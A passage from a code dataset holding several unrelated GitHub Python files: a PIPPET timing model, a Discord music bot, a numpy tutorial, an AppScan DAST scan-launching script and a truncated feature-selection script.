is_event:\n d_p_m *= -self.params.dt * lambda_prev\n self.p_m[t_i, s_i] = prev_p_m + d_p_m\n\n # Update posterior and lambda_m\n mu_m, V_m = self.step_stream(s_i, mu_prev, V_prev, is_event)\n lambda_m = self.streams[s_i].lambda_hat(mu_m, V_m)\n\n self.L_ms[t_i, s_i] = lambda_m\n mu_ms[s_i] = mu_m\n V_ms[s_i] = V_m\n\n if is_event:\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu_m, V_m)*self.params.dt)\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(1-self.streams[s_i].lambda_hat(mu_m, V_m)*self.params.dt)\n\n # Marginalize across patterns\n self.mu_s[t_i] = np.sum(self.p_m[t_i] * mu_ms)\n self.L_s[t_i] = np.sum(self.p_m[t_i] * self.L_ms[t_i])\n self.V_s[t_i] = np.sum(self.p_m[t_i] * V_ms)\n self.V_s[t_i] += np.sum(self.p_m[t_i]*(1 - self.p_m[t_i])*np.power(mu_ms, 2))\n for m in range(self.n_m):\n for 
n in range(self.n_m):\n if m != n:\n self.V_s[t_i] -= self.p_m[t_i,m]*self.p_m[t_i,n]*mu_ms[m]*mu_ms[n]\n\n return self.mu_s[t_i], self.V_s[t_i]\n\n def run(self) -> None:\n ''' Step through entire stimulus, for all patterns '''\n\n # For each time step\n for i in range(1, self.n_ts):\n lambda_prev = self.L_s[i-1]\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, lambda_prev, mu_prev, V_prev)\n\n\nclass oscPIPPET(PIPPET):\n ''' Oscillatory PIPPET '''\n\n def __init__(self, params: PIPPETParams):\n super().__init__(params)\n self.z_s = np.ones(self.n_ts, dtype=np.clongdouble)\n self.z_s[0] = np.exp(complex(-self.params.V_0/2, self.params.mu_0))\n\n def step(self, t_i: int, z_prev: complex, mu_prev: float, V_prev: float) -> complex:\n ''' Posterior update for a time step '''\n\n dz_sum = 0\n for s_i in range(self.n_streams):\n blambda = self.streams[s_i].zlambda(mu_prev, V_prev, self.params.tau)\n z_hat = self.streams[s_i].z_hat(mu_prev, V_prev, blambda, self.params.tau)\n dz_sum += blambda*(z_hat-z_prev)*self.params.dt\n\n dz_par = -(self.params.sigma_phi**2)/2 * self.params.dt\n dz_perp = self.params.tau * self.params.dt\n z = z_prev * np.exp(1j*dz_perp + dz_par) - dz_sum\n # Alternatively:\n #z = z_prev + z_prev*complex(-(self.params.sigma_phi**2)/2, self.params.tau)*self.params.dt - dz_sum\n\n mu, V = PIPPETStream.z_mu_V(z)\n\n t_prev, t = self.ts[t_i-1], self.ts[t_i]\n for s_i in range(self.n_streams):\n if self.is_onset(t_prev, t, s_i):\n z = self.streams[s_i].z_hat(mu, V, self.streams[s_i].zlambda(mu, V, self.params.tau), self.params.tau)\n mu, V = PIPPETStream.z_mu_V(z)\n self.event_n[s_i] += 1\n self.idx_event.add(t_i)\n self.event_stream[t_i].add(s_i)\n\n self.surp[t_i, s_i, 0] = -np.log(self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(self.streams[s_i].zlambda(mu_prev+.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] += np.log(self.streams[s_i].zlambda(mu_prev-.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n else:\n self.surp[t_i, s_i, 0] = -np.log(1-self.streams[s_i].lambda_hat(mu_prev, V_prev)*self.params.dt)\n self.surp[t_i, s_i, 1] = -np.log(1-self.streams[s_i].lambda_hat(mu, V)*self.params.dt)\n self.grad[t_i, s_i] = -np.log(1-self.streams[s_i].zlambda(mu_prev+.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] += np.log(1-self.streams[s_i].zlambda(mu_prev-.01, V_prev, self.params.tau)*self.params.dt)\n self.grad[t_i, s_i] /= .02\n\n # Noise\n mu += np.sqrt(self.params.dt) * self.params.eta_mu * np.random.randn()\n V *= np.exp(np.sqrt(self.params.dt) * self.params.eta_V * np.random.randn())\n\n # Update\n self.mu_s[t_i], self.V_s[t_i] = mu, V\n self.z_s[t_i] = np.exp(complex(-V/2, mu))\n\n return self.z_s[t_i]\n\n def run(self) -> None:\n ''' Step through entire stimulus, tracking sufficient statistics '''\n for i in range(1, self.n_ts):\n z_prev = self.z_s[i-1]\n mu_prev = self.mu_s[i-1]\n V_prev = self.V_s[i-1]\n _ = self.step(i, z_prev, mu_prev, V_prev)\n\n\nif __name__ == \"__main__\":\n import pdb\n print('Debugger on - press \\'c\\' to continue examples, \\'q\\' to quit')\n\n # PIPPET parameters, including event times and expectations\n p = PIPPETParams()\n p.overtime = 0.2\n e_times = np.array([0.5, 1.0])\n e_means = np.array([0.25, 0.5, 0.75, 1.0])\n e_vars = np.array([0.0001]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n 
p.add(e_times, e_means, e_vars, e_lambdas, 'Duple')\n\n # Run PIPPET (mPIPPET but with one expected event stream)\n m = mPIPPET(p)\n print('Running (m)PIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run mPIPPET - two expected event streams, Duple/Triple\n e_means = np.array([0.33, 0.66, 1.0])\n e_vars = np.array([0.0001]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n p.add(e_times, e_means, e_vars, e_lambdas, 'Triple')\n m = mPIPPET(p)\n print('Running mPIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run pPIPPET - now have competing event streams, equal prior\n prior = np.array([0.5, 0.5])\n m = pPIPPET(p, prior)\n print('Running pPIPPET...')\n m.run()\n pdb.set_trace()\n\n # Run oscPIPPET - redefine parameter set of wrapped stream\n p = PIPPETParams()\n p.dt = 0.002\n p.overtime = np.pi/10.\n p.sigma_phi = 0.2\n p.mu_0 = 1\n p.V_0 = 10.0\n p.lambda_0 = 0.001\n e_means = np.array([0])\n e_times = np.array([np.pi, 3*np.pi -.3, 5*np.pi])\n e_vars = np.array([0.005]).repeat(len(e_means))\n e_lambdas = np.array([0.02]).repeat(len(e_means))\n p.add(e_times, e_means, e_vars, e_lambdas, '')\n print('Running oscPIPPET...')\n m = oscPIPPET(p)\n m.run()\n pdb.set_trace()\n\n","repo_name":"Kappers/pyPIPPET","sub_path":"PIPPET.py","file_name":"PIPPET.py","file_ext":"py","file_size_in_byte":20340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36607644460","text":"import discord\nimport os\nfrom discord.ext import commands\nfrom youtube_dl import YoutubeDL\nimport asyncio\nfrom discord.utils import get\nfrom discord.ext.commands.bot import Bot\nfrom discord.member import VoiceState\nfrom discord.ext.commands.context import Context\nfrom src.CurrentSong import CurrentSong\nfrom src.constants import HELP_MESSAGE\n\n\nclass EmptyPlaylistException(Exception):\n pass\n\n\nclass PlaylistBoundsException(Exception):\n pass\n\n\nclass MusicCog(commands.Cog):\n def __init__(self, bot: Bot):\n \"\"\"Cog constructor.\n\n Args:\n bot (Bot): Discord bot refference.\n \"\"\"\n self.YTDL_OPTIONS = {\n \"format\": \"bestaudio\",\n \"noplaylist\": True,\n }\n self.FFMPEG_OPTIONS = {\n \"before_options\": \"-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5\",\n \"options\": \"-vn\",\n }\n self.bot = bot\n self.help_message = HELP_MESSAGE\n self.is_playing_on_server = {}\n self.server_playlist = {}\n self.server_mutex_playlist = {}\n self.server_voice_channel = {}\n self.server_current_song = {}\n\n def init_channel(self, ctx: Context):\n \"\"\"Initializing voice channel for bot.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_playlist[ctx.guild.id] = []\n self.server_mutex_playlist[ctx.guild.id] = asyncio.Lock()\n self.server_voice_channel[ctx.guild.id] = ctx.author.voice.channel\n self.server_current_song[ctx.guild.id] = CurrentSong(\"\", \"\")\n\n def search_youtube(self, item: str) -> any:\n \"\"\"Function search for given song in YouTube.\n\n Args:\n item (str): Specified song to search.\n\n Returns:\n any: Returns dict of song info if everything ok, else False.\n \"\"\"\n with YoutubeDL(self.YTDL_OPTIONS) as ydl:\n try:\n info = ydl.extract_info(\"ytsearch:%s\" % item, download=False)[\n \"entries\"\n ][0]\n except Exception:\n return False\n\n return {\n \"source\": info[\"formats\"][0][\"url\"],\n \"title\": info[\"title\"],\n \"duration\": info[\"duration\"],\n \"yt_url\": info[\"webpage_url\"],\n }\n\n async def send_message(self, 
message_str: str, ctx: Context):\r\n \"\"\"Sends message in correct template.\r\n\r\n Args:\r\n message_str (str): Specified message to send.\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n await ctx.send(f\"```\\n{message_str}\\n```\")\r\n\r\n def is_channel_specified(self, ctx: Context) -> bool:\r\n \"\"\"Checks if sender of message is on any voice channel.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n\r\n Returns:\r\n bool: True if voice channel on contextual server is specified.\r\n \"\"\"\r\n if (\r\n ctx.guild.id in self.server_voice_channel.keys()\r\n and self.server_voice_channel[ctx.guild.id] != \"\"\r\n ):\r\n return True\r\n else:\r\n return False\r\n\r\n async def send_funny_gifs(self, query: str, song: dict, ctx):\r\n \"\"\"Checks if song has key-words and sends funny gifs if True.\r\n\r\n Args:\r\n query (str): Searching quote.\r\n song (dict): Song info.\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n concat_str = query.upper() + song[\"title\"].upper()\r\n gifx = False\r\n if concat_str.find(\"XAYOO\") != -1:\r\n gifx = True\r\n gifb = False\r\n if (\r\n concat_str.find(\"BOXDEL\") != -1\r\n or concat_str.find(\"MASN\") != -1\r\n or concat_str.find(\"AFERKI\") != -1\r\n or concat_str.find(\"MGNG\") != -1\r\n ):\r\n gifb = True\r\n if gifx:\r\n await ctx.send(\"https://tenor.com/view/xayoo-twitch-idol-gif-22718834\")\r\n if gifb:\r\n await ctx.send(\r\n \"https://tenor.com/view/boxdel-kwatera-pszczulka-kofelina-jasper-gif-22735704\"\r\n )\r\n\r\n def play_next(self, ctx: Context):\r\n \"\"\"Plays next song on playlist.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n if len(self.server_playlist[ctx.guild.id]) > 0:\r\n self.is_playing_on_server[ctx.guild.id] = True\r\n song_url = self.server_playlist[ctx.guild.id][0][0][\"source\"]\r\n popped_song = self.server_playlist[ctx.guild.id].pop(0)\r\n self.server_current_song[ctx.guild.id].song_url = popped_song[0][\"yt_url\"]\r\n self.server_current_song[ctx.guild.id].song_name = popped_song[0][\"title\"]\r\n\r\n try:\r\n self.server_voice_channel[ctx.guild.id].play(\r\n discord.FFmpegPCMAudio(song_url, **self.FFMPEG_OPTIONS),\r\n after=lambda f: self.play_next(ctx),\r\n )\r\n except discord.errors.ClientException as e:\r\n if str(e) == \"Already playing audio.\":\r\n print(\"~BOT ERROR~ | ~Already playing audio exception!~\")\r\n else:\r\n self.is_playing_on_server[ctx.guild.id] = False\r\n self.server_current_song[ctx.guild.id].clear_info()\r\n\r\n async def reconnect(self, ctx: Context):\r\n \"\"\"Provides reconnecting to channel after network error.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n print(\"~BOT STATE INFO~ | ~Bot is reconnecting~\")\r\n self.server_voice_channel[ctx.guild.id] = await self.server_playlist[\r\n ctx.guild.id\r\n ][0][1].connect()\r\n\r\n song_url = self.server_playlist[ctx.guild.id][0][0][\"source\"] # bugfix: m_url was undefined\r\n self.server_voice_channel[ctx.guild.id].play(\r\n discord.FFmpegPCMAudio(song_url, **self.FFMPEG_OPTIONS),\r\n after=lambda f: self.play_next(ctx),\r\n )\r\n\r\n async def play_music(self, ctx: Context):\r\n \"\"\"Function starts playing music on server.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n if len(self.server_playlist[ctx.guild.id]) > 0:\r\n self.is_playing_on_server[ctx.guild.id] = True\r\n await self.server_mutex_playlist[ctx.guild.id].acquire()\r\n try:\r\n song_url = self.server_playlist[ctx.guild.id][0][0][\"source\"]\r\n finally:\r\n self.server_mutex_playlist[ctx.guild.id].release()\r\n try:\r\n self.server_voice_channel[ctx.guild.id] = await self.server_playlist[\r\n ctx.guild.id\r\n ][0][1].connect()\r\n except discord.errors.ClientException:\r\n await 
self.server_voice_channel[ctx.guild.id].move_to(\r\n self.server_playlist[ctx.guild.id][0][1]\r\n )\r\n\r\n await self.server_mutex_playlist[ctx.guild.id].acquire()\r\n try:\r\n popped_song = self.server_playlist[ctx.guild.id].pop(0)\r\n self.server_current_song[ctx.guild.id].song_url = popped_song[0][\r\n \"yt_url\"\r\n ]\r\n self.server_current_song[ctx.guild.id].song_name = popped_song[0][\r\n \"title\"\r\n ]\r\n finally:\r\n self.server_mutex_playlist[ctx.guild.id].release()\r\n try:\r\n self.server_voice_channel[ctx.guild.id].play(\r\n discord.FFmpegPCMAudio(song_url, **self.FFMPEG_OPTIONS),\r\n after=lambda f: self.play_next(ctx),\r\n )\r\n except discord.errors.ClientException:\r\n await self.reconnect(ctx) # bugfix: coroutine was never awaited\r\n else:\r\n self.is_playing_on_server[ctx.guild.id] = False\r\n self.server_current_song[ctx.guild.id].clear_info()\r\n\r\n @commands.command(aliases=[\"p\", \"play\", \"P\"])\r\n async def _play(self, ctx: Context, *args):\r\n \"\"\"Reacts to the '!play' command.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n query = \" \".join(args)\r\n if ctx.author.voice is None or ctx.author.voice.channel is None:\r\n await self.send_message(\r\n \"You need to be in any voice channel to invite me! 🤬\", ctx\r\n )\r\n await ctx.send(\"https://j.gifs.com/qxjV50.gif\")\r\n else:\r\n if ctx.guild.id not in self.is_playing_on_server.keys():\r\n self.init_channel(ctx)\r\n voice_channel = ctx.author.voice.channel\r\n song = self.search_youtube(query)\r\n if type(song) == bool:\r\n await self.send_message(\r\n \"Try other video, this one can't be played! 🤐\", ctx\r\n )\r\n await ctx.send(\"https://c.tenor.com/ACD_2wFkA4QAAAAC/tssk-no.gif\")\r\n else:\r\n await self.server_mutex_playlist[ctx.guild.id].acquire()\r\n try:\r\n await self.send_funny_gifs(query, song, ctx)\r\n await self.send_message(\r\n \"Song {} added to the queue, its current position: {}\".format(\r\n song[\"title\"],\r\n str(len(self.server_playlist[ctx.guild.id]) + 1),\r\n ),\r\n ctx,\r\n )\r\n self.server_playlist[ctx.guild.id].append([song, voice_channel])\r\n finally:\r\n self.server_mutex_playlist[ctx.guild.id].release()\r\n if self.is_playing_on_server[ctx.guild.id] is False:\r\n await self.play_music(ctx)\r\n\r\n @commands.command(aliases=[\"queue\", \"q\", \"playlist\"])\r\n async def _queue(self, ctx: Context):\r\n \"\"\"Shows queue/playlist.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n retval = \"\"\r\n for i in range(0, len(self.server_playlist[ctx.guild.id])):\r\n retval += (\r\n str(i + 1)\r\n + \"-> \"\r\n + self.server_playlist[ctx.guild.id][i][0][\"title\"]\r\n + \" | \"\r\n + f\"{(self.server_playlist[ctx.guild.id][i][0]['duration'] // 60)}\"\r\n + \":\"\r\n + f\"{(self.server_playlist[ctx.guild.id][i][0]['duration'] % 60):02}\"\r\n + \"\\n\"\r\n )\r\n\r\n if retval != \"\":\r\n await self.send_message(retval, ctx)\r\n else:\r\n await self.send_message(\"No music in queue! 🛑\", ctx)\r\n\r\n @commands.command(aliases=[\"current\", \"current_song\"])\r\n async def _current(self, ctx: Context):\r\n \"\"\"Shows currently played song.\r\n\r\n Args:\r\n ctx (Context): Context of executed discord command.\r\n \"\"\"\r\n if not self.server_current_song[ctx.guild.id].is_empty():\r\n await self.send_message(\r\n \"Current song's name is: {} | [{}]\".format(\r\n self.server_current_song[ctx.guild.id].song_name,\r\n self.server_current_song[ctx.guild.id].song_url,\r\n ),\r\n ctx,\r\n )\r\n else:\r\n await self.send_message(\"There is no current song! 🛑\", ctx)\r\n\r\n @commands.command(aliases=[\"skip\", \"s\"])\r\n async def _skip(self, ctx: Context):\r\n \"\"\"Skips currently played song.\r\n\r\n Args:\r\n ctx (Context, optional): Context of executed discord command. 
Defaults to None.\n \"\"\"\n if self.is_channel_specified(ctx):\n self.server_voice_channel[ctx.guild.id].pause()\n await self.play_music(ctx)\n\n @commands.command(aliases=[\"clear\", \"c\"])\n async def _clear(self, ctx: Context):\n \"\"\"Clears whole playlist and stop playing bot.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n if self.is_channel_specified(ctx):\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n self.server_voice_channel[ctx.guild.id].stop()\n self.server_playlist[ctx.guild.id] = []\n self.is_playing_on_server[ctx.guild.id] = False\n self.server_current_song[ctx.guild.id].clear_info()\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n\n @commands.command(aliases=[\"remove\", \"r\"])\n async def _remove(self, ctx: Context, *args):\n \"\"\"Removes song with given index from playlist.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n query = \" \".join(args)\n try:\n if len(self.server_playlist[ctx.guild.id]) == 0:\n raise EmptyPlaylistException\n int_arg = int(query)\n if int_arg < 1 or int_arg > len(self.server_playlist[ctx.guild.id]):\n raise PlaylistBoundsException(f\"{int_arg}\")\n await self.server_mutex_playlist[ctx.guild.id].acquire()\n try:\n self.server_playlist[ctx.guild.id].pop(int_arg - 1)\n finally:\n self.server_mutex_playlist[ctx.guild.id].release()\n\n except (EmptyPlaylistException):\n await self.send_message(\"🛑 You can't remove from empty playlist! 🛑\", ctx)\n except (ValueError):\n await self.send_message(\n \"🛑 Hold on! You passed incorrect argument! 🛑\\nExample use:\\n\\n====================\\n!remove 2\\n====================\",\n ctx,\n )\n except (PlaylistBoundsException) as e:\n await self.send_message(\n f\"🛑 There is no {e}. place on the playlist! Try numbers from 1 to {len(self.server_playlist[ctx.guild.id])} 🛑\",\n ctx,\n )\n\n @commands.command(aliases=[\"help\", \"h\"])\n async def _help(self, ctx: Context):\n \"\"\"Shows help message.\n\n Args:\n ctx (Context): Context of executed discord command.\n \"\"\"\n await self.send_message(self.help_message, ctx)\n\n @commands.Cog.listener()\n async def on_voice_state_update(\n self, ctx: Context, before: VoiceState, after: VoiceState\n ):\n \"\"\"Function reacts on disconnection of bot from voice channel. 
It executes _clear method.\n\n Args:\n ctx (Context): Context of executed discord command.\n before (VoiceState): State of channel before disconnection.\n after (VoiceState): State of channel after disconnection.\n \"\"\"\n if (\n before.channel is not None\n and after.channel is None\n and str(ctx) == \"DJ WidziszMnie#0843\"\n ):\n print(\"~BOT_INFO~ | Bot disconnected!\")\n await self._clear(ctx)\n","repo_name":"lukasz-staniszewski/discord-music-bot","sub_path":"src/musicBot.py","file_name":"musicBot.py","file_ext":"py","file_size_in_byte":14614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"69844429373","text":"# Write a Python program to count the number of even and odd numbers from a series of numbers.\r\n\r\nlist = [1,2,3,4,5,6,7,8,9]\r\n\r\neven_count = 0\r\nodd_count = 0\r\n\r\nfor i in list:\r\n if i % 2==0:\r\n even_count += 1\r\n else:\r\n odd_count += 1 \r\n\r\nprint(\"No of even numbers:\",even_count)\r\nprint(\"No of odd numbers:\",odd_count)","repo_name":"SrikanthMaku/PyAss103","sub_path":"Assignment103.py","file_name":"Assignment103.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27466077508","text":"from numpy import *\r\n\r\n\"\"\"\r\n## Creating Arrays ##\r\n\r\n# array()\r\narr1 = array([5, 7, 6, 3], float)\r\nprint(arr1)\r\n\r\n# linspace()\r\narr2 = linspace(0, 15, 16) # starting(included), ending(included), number of ways it can be divided\r\nprint(arr2)\r\n\r\n# arange()\r\narr3 = arange(1, 15, 2) # starting(included), ending(included), spacing between two numbers\r\nprint(arr3)\r\n\r\n# logspace()\r\narr4 = logspace(1, 40, 5) # 10^starting(included), 10^ending(included), divided into parts\r\nprint(arr4)\r\nprint('%.2f' % arr4[0])\r\nprint('%.2f' % arr4[4])\r\n\r\n# zeros() and ones()\r\narr5 = zeros(5)\r\narr6 = ones(5, int) # implicitly float, explicitly any data type\r\nprint(arr5, arr6)\r\n\"\"\"\r\n\r\n\"\"\"\r\n## Operations on array ##\r\n\r\n# Addition & Subtraction\r\narr = array([1, 2, 3, 4, 5])\r\narr = arr + 5\r\nprint(arr)\r\n\r\narr1 = array([1, 2, 3, 4, 5])\r\narr2 = array([1, 2, 3, 4, 5])\r\narr3 = arr1 + arr2\r\nprint(arr3)\r\n\r\n# inbuilt functions\r\nprint(sum(arr1)) # min, max, avg, etc\r\nprint(sin(arr1)) # cos, tan, sinh, cosh, etc\r\nprint(log(arr1)) # e, pi, etc\r\nprint(sqrt(arr1)) # ceil, floor, pow, etc\r\nprint(sort(arr1)) # reverse, etc\r\nprint(concatenate([arr1, arr2])) # compare, etc\r\n\"\"\"\r\n\r\n## Copying an Array ##\r\nar1 = array([1, 2, 9, 8, 5])\r\nar2 = ar1\r\nprint(ar1, id(ar1))\r\nprint(ar2, id(ar2))\r\n\r\n# view - shallow copy\r\na1 = array([1, 2, 9, 8, 5])\r\na2 = a1.view()\r\na1[1] = 7\r\na2[2] = 67\r\nprint(a1, id(a1)) # different address's, but when one array value is mutated the other array got mutated too\r\nprint(a2, id(a2))\r\n\r\n# copy - deep copy\r\nb1 = array([1, 2, 9, 8, 5])\r\nb2 = b1.copy()\r\nb1[1] = 7\r\nb2[2] = 67\r\nprint(b1, id(b1)) # different address's, and when one array value is mutated it does not affect the other arrays\r\nprint(b2, id(b2))\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Numpy Operations.py","file_name":"Numpy Operations.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"31255580110","text":"#!/usr/bin/env python3\r\nimport requests\r\nimport json\r\nimport sys\r\nimport time\r\n\r\n# The 
ASoC REST APIs used in this script:\r\nREST_APIKEYLOGIN = \"https://cloud.appscan.com/api/v2/Account/ApiKeyLogin\"\r\nREST_SCANS = \"https://cloud.appscan.com/api/v2/Scans/DynamicAnalyzer\"\r\nbase_api_url = \"https://cloud.appscan.com/api/v2\"\r\n\r\n\r\ndef generate_engagement_id():\r\n return str(int(time.time())) # Use timestamp as engagement ID\r\n\r\n\r\ndef main():\r\n if len(sys.argv) != 6:\r\n print(\"\\nUsage: python appscan_dast.py <API_KEY> <API_SECRET> <APP_ID> <TARGET_URL> <SCAN_NAME>\\n\")\r\n sys.exit(1)\r\n\r\n API_KEY = sys.argv[1]\r\n API_SECRET = sys.argv[2]\r\n APP_ID = sys.argv[3]\r\n TARGET_URL = sys.argv[4]\r\n SCAN_NAME = sys.argv[5]\r\n\r\n token = get_token(API_KEY, API_SECRET)\r\n\r\n scan_id = start_dast_scan(token, APP_ID, TARGET_URL, SCAN_NAME)\r\n print(f\"DAST scan started successfully. Scan ID: {scan_id}\")\r\n\r\n # Generate engagement ID\r\n engagement_id = generate_engagement_id()\r\n\r\n print(f\"Waiting for scan to finish\")\r\n start = time.time()\r\n elapsed = 0\r\n max_time = 60 * 30\r\n prev_status = \"\" # bugfix: initialise once, outside the polling loop\r\n\r\n while elapsed < max_time:\r\n status_obj = get_scan_status(token, scan_id)\r\n if status_obj is None:\r\n print(\"Error getting status\")\r\n break\r\n\r\n status = status_obj[\"Status\"]\r\n\r\n if status != prev_status:\r\n prev_status = status\r\n print(f\"Scan Status: {prev_status}\")\r\n\r\n if status == \"Completed\":\r\n print(f\"Scan completed with status: {status}\")\r\n print(\"Scan Summary:\")\r\n print(f\"\\t High Issues: {status_obj['HighVulnerabilities']}\")\r\n print(f\"\\t Med Issues: {status_obj['MediumVulnerabilities']}\")\r\n print(f\"\\t Low Issues: {status_obj['LowVulnerabilities']}\")\r\n print()\r\n print(f\"For full details visit: https://cloud.appscan.com/main/myapps/{APP_ID}/scans/{scan_id}/scanOverview\")\r\n report_id = generate_report(token, scan_id, SCAN_NAME)\r\n if report_id is not None:\r\n break\r\n elif status == \"Error\":\r\n print(f\"Scan completed with status: {status}\")\r\n print(f\"Error message: {status_obj['ErrorMessage']}\")\r\n break\r\n\r\n time.sleep(30)\r\n elapsed = time.time() - start\r\n\r\n if elapsed >= max_time:\r\n print(\"Scan timed out after 30 minutes.\")\r\n\r\n\r\ndef get_token(api_key, api_secret):\r\n try:\r\n json_data = {\"KeyId\": api_key, \"KeySecret\": api_secret}\r\n response = requests.post(REST_APIKEYLOGIN, json=json_data)\r\n response.raise_for_status()\r\n json_data = json.loads(response.text)\r\n return json_data['Token']\r\n except requests.exceptions.RequestException as e:\r\n print(\"Error in get_token():\\n\" + str(e))\r\n sys.exit(1)\r\n\r\n\r\ndef start_dast_scan(token, app_id, target_url, scan_name):\r\n try:\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/json\"\r\n }\r\n json_data = {\r\n \"AppId\": app_id,\r\n \"StartingUrl\": target_url,\r\n \"Profile\": \"Default\",\r\n \"PresenceId\" : \"1791027c-d05e-ee11-8457-14cb65725114\",\r\n \"ScanName\": scan_name,\r\n \"Incremental\": False,\r\n \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"\r\n }\r\n response = requests.post(REST_SCANS, headers=headers, json=json_data)\r\n response.raise_for_status()\r\n json_data = json.loads(response.text)\r\n return json_data['Id']\r\n except requests.exceptions.RequestException as e:\r\n print(\"Error in start_dast_scan():\\n\" + str(e))\r\n sys.exit(1)\r\n\r\n\r\ndef get_scan_status(token, scan_id):\r\n headers = {\r\n \"accept\": \"application/json\",\r\n \"Authorization\": f\"Bearer 
{token}\",\r\n }\r\n r = requests.get(f\"https://cloud.appscan.com/api/v2/Scans/DynamicAnalyzer/{scan_id}\", headers=headers)\r\n if r.status_code != 200:\r\n print(f\"Error getting scan status: {r.status_code}\")\r\n return None\r\n response_json = r.json()\r\n return {\r\n \"Status\": response_json.get(\"LatestExecution\", {}).get(\"ExecutionProgress\"),\r\n \"HighVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NHighIssues\"),\r\n \"MediumVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NMediumIssues\"),\r\n \"LowVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NLowIssues\"),\r\n \"ErrorMessage\": response_json.get(\"LatestExecution\", {}).get(\"ErrorMessage\")\r\n }\r\n\r\n\r\ndef generate_report(token, scan_id, scan_name):\r\n url = f\"https://cloud.appscan.com/api/v2/Reports/Security/Scan/{scan_id}\"\r\n\r\n headers = {\r\n 'Content-Type': 'application/json',\r\n 'Authorization': f'Bearer {token}'\r\n }\r\n\r\n body = {\r\n 'Configuration': {\r\n 'Summary': 'true',\r\n 'Details': 'true',\r\n 'Discussion': 'true',\r\n 'Overview': 'true',\r\n 'TableOfContent': 'true',\r\n 'Advisories': 'true',\r\n 'FixRecommendation': 'true',\r\n 'History': 'true',\r\n 'Coverage': 'true',\r\n 'MinimizeDetails': 'true',\r\n 'Articles': 'true',\r\n 'ReportFileType': 'XML',\r\n 'Title': scan_name,\r\n 'Locale': 'en-US',\r\n 'Notes': 'Generated by Python script',\r\n 'Comments': 'true'\r\n }\r\n }\r\n\r\n try:\r\n response = requests.post(url, headers=headers, json=body)\r\n response.raise_for_status()\r\n report_id = response.json().get('Id')\r\n print(f\"Report generated successfully. Report ID: {report_id}\")\r\n return report_id\r\n\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Error generating report: {e}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ausmanki/demo","sub_path":"r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"19365645606","text":"\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn import linear_model\r\nfrom sklearn import preprocessing\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.feature_selection import RFE\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\nfrom sklearn.feature_selection import f_regression\r\n\r\nimport numpy as np\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n# https://www.yourdatateacher.com/2021/10/11/feature-selection-with-random-forest/\r\ndef return_new_FeaturesRFE(X_tr, y_tr):\r\n features = list(X_tr.columns.values)\r\n rf = RandomForestRegressor(random_state=0)\r\n\r\n rf.fit(X_tr, y_tr)\r\n\r\n f_i = list(zip(features, rf.feature_importances_))\r\n f_i.sort(key=lambda x: x[1])\r\n plt.barh([x[0] for x in f_i], [x[1] for x in f_i])\r\n\r\n 